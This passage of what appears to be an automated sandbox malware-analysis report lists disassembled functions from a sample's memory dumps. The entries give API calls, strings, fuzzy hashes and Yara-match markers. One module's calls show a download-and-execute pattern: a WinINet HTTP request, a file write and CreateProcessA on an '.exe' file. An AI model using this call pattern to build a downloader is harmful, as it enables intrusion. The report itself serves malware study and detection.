Part of subcall function 6C3EE190: PR_EnterMonitor.NSS3(?,?,6C3EE175), ref: 6C3EE19C
Part of subcall function 6C3EE190: PR_EnterMonitor.NSS3(6C3EE175), ref: 6C3EE1AA
Part of subcall function 6C3EE190: PR_ExitMonitor.NSS3 ref: 6C3EE208
Part of subcall function 6C3EE190: PL_HashTableRemove.NSS3(?), ref: 6C3EE219
Part of subcall function 6C3EE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C3EE231
Part of subcall function 6C3EE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C3EE249
Part of subcall function 6C3EE190: PR_ExitMonitor.NSS3 ref: 6C3EE257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3F1E37
PR_ExitMonitor.NSS3 ref: 6C3F1E4A

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: b6600aaeafa2813ac5c60179a6ad0f97ea15176a100a65fa377566dc2cd4d9f3
Instruction ID: 9654cce8deb24cf723ecf7aa6ad52c2f5de321290dccb42abcbf1d31caba99c8
Opcode Fuzzy Hash: b6600aaeafa2813ac5c60179a6ad0f97ea15176a100a65fa377566dc2cd4d9f3
Instruction Fuzzy Hash: 2D01F7B1B0025097EB009A65FC00F927774ABB174CF214036D52897B95E733E826CFD2

Function 6C3F1D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3F1D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C3F1D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6C3F1D9C
free.MOZGLUE(00000000), ref: 6C3F1DB8

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: f741b01c7998dcd1b598d1d3273d0e92092820397eb551fa37ffb68ddca14a07
Instruction ID: 3089c64cbe0c808ad9185481c07c0483d31d607122bc6632e152fc7503f71284
Opcode Fuzzy Hash: f741b01c7998dcd1b598d1d3273d0e92092820397eb551fa37ffb68ddca14a07
Instruction Fuzzy Hash: F0F0F9F2A4121057FB105E197C41F673668DB917ACF210A39FE2D8BB50DBB2E4068AF1

Function 6C43FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C3E9003,?), ref: 6C43FD91

Part of subcall function 6C440BE0: malloc.MOZGLUE(6C438D2D,?,00000000,?), ref: 6C440BF8
Part of subcall function 6C440BE0: TlsGetValue.KERNEL32(6C438D2D,?,00000000,?), ref: 6C440C15

PORT_Alloc_Util.NSS3(A4686C44,?), ref: 6C43FDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686C44,?,?), ref: 6C43FDC4
free.MOZGLUE(00000000,?,?), ref: 6C43FDD1

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: f9d461a03f41b4ddd2a957a7a1bed2fc03c40865dbad1a9d7b8d802ca28f06d5
Instruction ID: f3923820b21f568ff7ac435d59b15eb102170a5112c2a03708b784f25b754fd4
Opcode Fuzzy Hash: f9d461a03f41b4ddd2a957a7a1bed2fc03c40865dbad1a9d7b8d802ca28f06d5
Instruction Fuzzy Hash: 9DF0C8B16022525BFB01CB5ADC84D177B58EFD829AB148174ED0E8BB41E721D815C7E1

Function 0062291C Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,0064761F,?,?,?), ref: 00622934
HeapAlloc.KERNEL32(00000000), ref: 0062293B
GetLocalTime.KERNEL32(?), ref: 00622947
wsprintfA.USER32 ref: 00622972

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: ebf505d3eec701d71a74a45c54464c93e2dcfd68aceff30d0a0b450a86dd96a8
Instruction ID: b0939b900de2b83f0404e13cf6edbdc9fabe2e5eaf719736413067b7690dc29b
Opcode Fuzzy Hash: ebf505d3eec701d71a74a45c54464c93e2dcfd68aceff30d0a0b450a86dd96a8
Instruction Fuzzy Hash: 4AF0E165900218BBDB50DBE59C09ABF77BCBF0D752F000055FA45E2190DA7C9A40D7B5

Function 6C4FCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C4FCC61
free.MOZGLUE ref: 6C4FCC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C4FCC80
free.MOZGLUE(?), ref: 6C4FCC87

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 4dc87b7d134c8e05903bb70dea9563e95cf298f9b9f79b7ce1479431d9dea0f6
Instruction ID: d11030971bc979a3db69b2423347b60e9db3255078faf0c77fb70b2cca09605a
Opcode Fuzzy Hash: 4dc87b7d134c8e05903bb70dea9563e95cf298f9b9f79b7ce1479431d9dea0f6
Instruction Fuzzy Hash: 92E030767006189BCA10EFA8DC4488A77ACEE492703160625E695C7700E331F905CBA5

Function 6C3D9DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6C3D9E1F

Part of subcall function 6C3913C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C362352,?,00000000,?,?), ref: 6C391413
Part of subcall function 6C3913C0: memcpy.VCRUNTIME140(00000000,R#6l,00000002,?,?,?,?,6C362352,?,00000000,?,?), ref: 6C3914C0

Strings

LIKE or GLOB pattern too complex, xrefs: 6C3DA006
ESCAPE expression must be a single character, xrefs: 6C3D9F78

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: 778e1915a287bf6e93e72e2bdb2419787b14b80a8a85e5bdf8f81c325f87b4b5
Instruction ID: 39735ddf071bb1c54016cdfb9f012e8192c8e36b02d559f2a000d05995e18c84
Opcode Fuzzy Hash: 778e1915a287bf6e93e72e2bdb2419787b14b80a8a85e5bdf8f81c325f87b4b5
Instruction Fuzzy Hash: 0B811B72A043164BD700CF25C4A03ADB7F6AF4531DF1A8659D8A88BB81DB32F846CF91

Function 00624841 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 0061515F: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006151A6
Part of subcall function 0061515F: RtlAllocateHeap.NTDLL(00000000), ref: 006151AD
Part of subcall function 0061515F: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 006151CF
Part of subcall function 0061515F: StrCmpCA.SHLWAPI(?), ref: 006151E9
Part of subcall function 0061515F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00615219
Part of subcall function 0061515F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00615258
Part of subcall function 0061515F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00615288
Part of subcall function 0061515F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00615293

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 0062428C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,006267CA), ref: 006242A6

_memset.LIBCMT ref: 00624930
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000020,00000000,00000000,?,?,00647750), ref: 00624984

Strings

.exe, xrefs: 0062488D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
String ID: .exe
API String ID: 2831197775-4119554291
Opcode ID: b200c40725ccf3b28ca3a8d1286afeb91e5baf77afe9489b508d7d5b8e87b5f4
Instruction ID: 30c1f99cc7c8700a3576e364e5e9bce77fd69babf11cc12588b472d25f06c9f1
Opcode Fuzzy Hash: b200c40725ccf3b28ca3a8d1286afeb91e5baf77afe9489b508d7d5b8e87b5f4
Instruction Fuzzy Hash: 61419232E0052ABBCB50FBA9EC439DE777AAF44350F150424FA00BB151DB316F958AD5

Function 6C434D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C434D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C434DE6

Strings

%d.%d, xrefs: 6C434DDE

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 1e26f7d19e0000cee97a7675c33aa292013fc12536b6f00f51ae26ace677ec33
Instruction ID: f63e281c98cda19b7531183d70cabdc5ece7a89b167eb2d935e1d7b78c8d5faf
Opcode Fuzzy Hash: 1e26f7d19e0000cee97a7675c33aa292013fc12536b6f00f51ae26ace677ec33
Instruction Fuzzy Hash: 4731E8B2D042286AFB10DB629C05FFF7B68DF84308F011529ED499B781EB319905CBE1

Function 0061FF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0061FFAE
_memmove.LIBCMT ref: 0061FFDD

Strings

string too long, xrefs: 0061FFA9

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: a227d4e33480a2de045a87f67e09dda32a57aaaa8d152db1512cef2acd67d436
Instruction ID: 588a8428acfd47fc143b76e83d4beeb3fd2eda9ada160603a5285a366e3fd6ec
Opcode Fuzzy Hash: a227d4e33480a2de045a87f67e09dda32a57aaaa8d152db1512cef2acd67d436
Instruction Fuzzy Hash: 8D1182323007609FEB709F6C98419A6B7E6EF42754B28093DF5828B682C7F1D886C7D5

Function 00620532 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0062054B

Part of subcall function 006404C5: std::exception::exception.LIBCMT ref: 006404DA
Part of subcall function 006404C5: __CxxThrowException@8.LIBCMT ref: 006404EF
Part of subcall function 006404C5: std::exception::exception.LIBCMT ref: 00640500

Part of subcall function 006203BC: std::_Xinvalid_argument.LIBCPMT ref: 006203CC

_memmove.LIBCMT ref: 0062059D

Strings

invalid string position, xrefs: 00620546

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: f67f642da276e3c8f4bff21b4fff9443649c43082364f3d16ea901d0dff86db9
Instruction ID: 155c8c1432e62900e7be0a436e777df2bdbb6d3e2f7d68490d74127f6d50610a
Opcode Fuzzy Hash: f67f642da276e3c8f4bff21b4fff9443649c43082364f3d16ea901d0dff86db9
Instruction Fuzzy Hash: C611CE31300B249BEB249E2CE980A5A77A6EB04364B10496DF956DB243D770E980CFE9

Function 00620775 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00620784

Part of subcall function 006404C5: std::exception::exception.LIBCMT ref: 006404DA
Part of subcall function 006404C5: __CxxThrowException@8.LIBCMT ref: 006404EF
Part of subcall function 006404C5: std::exception::exception.LIBCMT ref: 00640500

memmove.MSVCRT(0061FF2F,0061FF2F,C6C68B00,C6C68B00,0061FF2F,0062056A,?,0061FF2F,?,?,006205EC,?,?,?,-00000001,?), ref: 006207BA

Strings

invalid string position, xrefs: 0062077F

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: b29c5fbece41864648721c6cefa8577a426155e0527d9b1b35d54c2fd4a3ee4d
Instruction ID: 5a355c892ecc9120c0c63f72307c7df087a3400ab5623f984962a866967a2612
Opcode Fuzzy Hash: b29c5fbece41864648721c6cefa8577a426155e0527d9b1b35d54c2fd4a3ee4d
Instruction Fuzzy Hash: ED016D35300A218BE7248E68A98452AB2F7EBC5711334497CD482C7646DBB0F8869F95

Function 6C454CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8El,00000000,00000000,?,?,6C453827,?,00000000), ref: 6C454D0A

Part of subcall function 6C440840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4408B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C454D22

Part of subcall function 6C43FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C3E1A3E,00000048,00000054), ref: 6C43FD56

Strings

'8El, xrefs: 6C454D07

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8El
API String ID: 1521942269-4292045440
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 4bb0ae0b3060452700236ed0705f1e99b39da3f1ddf198f998a5f6f17eeb4b9f
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: 62F06D3260122467EB108D6AAC80F4736DC9B456FEF641271ED28CF791E6A5CC3986E1

Function 00630C39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 00630C6E
DName::DName.LIBCMT ref: 00630C7A

Strings

{flat}, xrefs: 00630C69

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: fa4e6085693a7019fe70bb93c9b315b19cbbf2c7112b7247c3caa15429e271d4
Instruction ID: 2afaf20cd58dfe832ffbd7ae22433f0b087b56a6325e5a453142fb3a016ef1a3
Opcode Fuzzy Hash: fa4e6085693a7019fe70bb93c9b315b19cbbf2c7112b7247c3caa15429e271d4
